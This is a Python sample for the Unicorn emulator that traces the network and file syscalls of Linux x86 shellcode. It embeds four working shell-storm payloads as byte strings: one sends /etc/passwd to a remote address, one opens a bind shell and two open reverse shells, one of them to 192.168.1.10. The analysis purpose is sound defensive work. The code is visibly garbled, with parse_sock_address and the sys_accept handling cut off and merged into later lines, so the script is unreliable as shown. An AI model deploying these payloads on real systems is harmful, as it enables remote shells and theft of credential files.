#!/usr/bin/env python # Unicorn sample for auditing network connection and file handling in shellcode. # Nguyen Tan Cong from __future__ import print_function from unicorn import * from unicorn.x86_const import * import struct import uuid SIZE_REG = 4 SOCKETCALL_MAX_ARGS = 3 SOCKET_TYPES = { 1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW", 4: "SOCK_RDM", 5: "SOCK_SEQPACKET", 10: "SOCK_PACKET" } ADDR_FAMILY = { 0: "AF_UNSPEC", 1: "AF_UNIX", 2: "AF_INET", 3: "AF_AX25", 4: "AF_IPX", 5: "AF_APPLETALK", 6: "AF_NETROM", 7: "AF_BRIDGE", 8: "AF_AAL5", 9: "AF_X25", 10: "AF_INET6", 12: "AF_MAX" } # http://shell-storm.org/shellcode/files/shellcode-861.php X86_SEND_ETCPASSWD = b"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" # http://shell-storm.org/shellcode/files/shellcode-882.php X86_BIND_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80" # http://shell-storm.org/shellcode/files/shellcode-883.php X86_REVERSE_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" # http://shell-storm.org/shellcode/files/shellcode-849.php X86_REVERSE_TCP_2 = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\xc0\xa8\x01\x0a\x66\x68\x7a\x69\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80" # memory address where emulation starts ADDRESS = 0x1000000 # supported classes class IdGenerator: def __init__(self): self.__next_id = 3 # exclude sdtin, stdout, stderr def next(self): next_id = self.__next_id self.__next_id += 1 return next_id class LogChain: def __init__(self): self.__chains = {} self.__linking_fds = {} def clean(self): self.__chains = {} self.__linking_fds = {} def create_chain(self, my_id): if not my_id in self.__chains: self.__chains[my_id] = [] else: print("LogChain: id %d existed" % my_id) def add_log(self, id, msg): fd = self.get_original_fd(id) if fd is not None: self.__chains[fd].append(msg) else: print("LogChain: id %d doesn't exist" % id) def link_fd(self, from_fd, to_fd): if not to_fd in self.__linking_fds: self.__linking_fds[to_fd] = [] self.__linking_fds[to_fd].append(from_fd) def get_original_fd(self, fd): if fd in self.__chains: return fd for orig_fd, links in self.__linking_fds.items(): if fd in links: return orig_fd return None def print_report(self): print(""" ---------------- | START REPORT | ---------------- """) for my_id, logs in self.__chains.items(): print("---- START FD(%d) ----" % my_id) print("\n".join(logs)) print("---- END FD(%d) ----" % my_id) print(""" -------------- | END REPORT | -------------- """) # end supported classes # utilities def bin_to_ipv4(ip): return "%d.%d.%d.%d" % ( (ip & 0xff000000) >> 24, (ip & 0xff0000) >> 16, (ip & 0xff00) >> 8, (ip & 0xff)) def read_string(uc, addr): ret = "" c = uc.mem_read(addr, 1)[0] read_bytes = 1 while c != 0x0: ret += chr(c) c = uc.mem_read(addr + read_bytes, 1)[0] read_bytes += 1 return ret def parse_sock_address(sock_addr): sin_family, = struct.unpack("HI", sock_addr[2:8]) return "%s:%d" % (bin_to_ipv4(host), port) elif sin_family == 6: # AF_INET6 return "" def print_sockcall(msg): print(">>> SOCKCALL %s" % msg) # end utilities # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size)) # read this instruction code from memory tmp = uc.mem_read(address, size) print(">>> Instruction code at [0x%x] =" % (address), end="") for i in tmp: print(" %x" % i, end="") print("") # callback for tracing Linux interrupt def hook_intr(uc, intno, user_data): global id_gen # only handle Linux syscall if intno != 0x80: return eax = uc.reg_read(UC_X86_REG_EAX) ebx = uc.reg_read(UC_X86_REG_EBX) ecx = uc.reg_read(UC_X86_REG_ECX) edx = uc.reg_read(UC_X86_REG_EDX) eip = uc.reg_read(UC_X86_REG_EIP) # print(">>> INTERRUPT %d" % eax) if eax == 1: # sys_exit print(">>> SYS_EXIT") uc.emu_stop() elif eax == 3: # sys_read fd = ebx buf = ecx count = edx dummy_content = str(uuid.uuid1()).encode("latin1")[:32] if len(dummy_content) > count: dummy_content = dummy_content[:count] uc.mem_write(buf, dummy_content) msg = "read %d bytes from fd(%d) with dummy_content(%s)" % (count, fd, dummy_content) fd_chains.add_log(fd, msg) print(">>> %s" % msg) elif eax == 4: # sys_write fd = ebx buf = ecx count = edx content = uc.mem_read(buf, count) msg = "write data=%s count=%d to fd(%d)" % (content, count, fd) print(">>> %s" % msg) fd_chains.add_log(fd, msg) elif eax == 5: # sys_open filename_addr = ebx flags = ecx mode = edx filename = read_string(uc, filename_addr) dummy_fd = id_gen.next() uc.reg_write(UC_X86_REG_EAX, dummy_fd) msg = "open file (filename=%s flags=%d mode=%d) with fd(%d)" % (filename, flags, mode, dummy_fd) fd_chains.create_chain(dummy_fd) fd_chains.add_log(dummy_fd, msg) print(">>> %s" % msg) elif eax == 11: # sys_execv # print(">>> ebx=0x%x, ecx=0x%x, edx=0x%x" % (ebx, ecx, edx)) filename = read_string(uc, ebx) print(">>> SYS_EXECV filename=%s" % filename) elif eax == 63: # sys_dup2 fd_chains.link_fd(ecx, ebx) print(">>> SYS_DUP2 oldfd=%d newfd=%d" % (ebx, ecx)) elif eax == 102: # sys_socketcall # ref: http://www.skyfree.org/linux/kernel_network/socket.html call = uc.reg_read(UC_X86_REG_EBX) args = uc.reg_read(UC_X86_REG_ECX) SOCKETCALL_NUM_ARGS = { 1: 3, # sys_socket 2: 3, # sys_bind 3: 3, # sys_connect 4: 2, # sys_listen 5: 3, # sys_accept 9: 4, # sys_send 11: 4, # sys_receive 13: 2 # sys_shutdown } buf = uc.mem_read(args, SOCKETCALL_NUM_ARGS[call] * SIZE_REG) args = struct.unpack("<" + "I" * SOCKETCALL_NUM_ARGS[call], buf) # int sys_socketcall(int call, unsigned long *args) if call == 1: # sys_socket # err = sys_socket(a0,a1,a[2]) # int sys_socket(int family, int type, int protocol) family = args[0] sock_type = args[1] protocol = args[2] dummy_fd = id_gen.next() uc.reg_write(UC_X86_REG_EAX, dummy_fd) if family == 2: # AF_INET msg = "create socket (%s, %s) with fd(%d)" % (ADDR_FAMILY[family], SOCKET_TYPES[sock_type], dummy_fd) fd_chains.create_chain(dummy_fd) fd_chains.add_log(dummy_fd, msg) print_sockcall(msg) elif family == 3: # AF_INET6 pass elif call == 2: # sys_bind fd = args[0] umyaddr = args[1] addrlen = args[2] sock_addr = uc.mem_read(umyaddr, addrlen) msg = "fd(%d) bind to %s" % (fd, parse_sock_address(sock_addr)) fd_chains.add_log(fd, msg) print_sockcall(msg) elif call == 3: # sys_connect # err = sys_connect(a0, (struct sockaddr *)a1, a[2]) # int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen) fd = args[0] uservaddr = args[1] addrlen = args[2] sock_addr = uc.mem_read(uservaddr, addrlen) msg = "fd(%d) connect to %s" % (fd, parse_sock_address(sock_addr)) fd_chains.add_log(fd, msg) print_sockcall(msg) elif call == 4: # sys_listen fd = args[0] backlog = args[1] msg = "fd(%d) listened with backlog=%d" % (fd, backlog) fd_chains.add_log(fd, msg) print_sockcall(msg) elif call == 5: # sys_accept fd = args[0] upeer_sockaddr = args[1] upeer_addrlen = args[2] # print(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d" % (upeer_sockaddr, upeer_addrlen)) if upeer_sockaddr == 0x0: print_sockcall("fd(%d) accept client" % fd) else: upeer_len, = struct.unpack(">> Emulation done") except UcError as e: print("ERROR: %s" % e) fd_chains.print_report() # Globals fd_chains = LogChain() id_gen = IdGenerator() if __name__ == '__main__': test_i386(X86_SEND_ETCPASSWD) test_i386(X86_BIND_TCP) test_i386(X86_REVERSE_TCP) test_i386(X86_REVERSE_TCP_2)